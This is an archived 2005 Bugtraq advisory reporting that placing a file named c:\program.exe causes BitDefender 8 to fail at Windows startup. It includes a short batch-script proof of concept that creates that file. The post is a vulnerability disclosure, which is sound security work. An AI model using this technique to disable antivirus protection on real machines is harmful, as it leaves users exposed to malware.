[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050423030310.19443.qmail@www.securityfocus.com>
Date: 23 Apr 2005 03:03:10 -0000
From: SecuBox fRoGGz <unsecure@...teme.com>
To: bugtraq@...urityfocus.com
Subject: BitDefender 8 - Race condition vulnerability
-----------------------------
Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------
BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: www.bitdefender.com
VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Maybe other...
RACE CONDITION
--------------
At Windows startup, when a file named: program.exe is found on c:\
Windows send an alert message, messagebox controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup.
(Sorry, haven't got the exact english message)
At this moment, BitDefender can't start, so we have a session without virus protection.
PROOF OF CONCEPT
----------------
Open your notepad.exe and paste this batch script.
@echo off
echo #-------------------------------------------------------#
echo [ SecuBox - Proof of Concept (04.12.2005) ]
echo #-------------------------------------------------------#
echo # This script just create the race condition. #
echo # It might be use by virus. #
echo # Now, reboot your computer and watch your BitDef ! #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient ! #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit
EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.
VENDOR STATUS
-------------
Vendor have been contacted but no reply ...
CREDITS
----------------------
SecuBox Labs - fRoGGz
unsecure@...teme.com
----------------------
Powered by blists - more mailing lists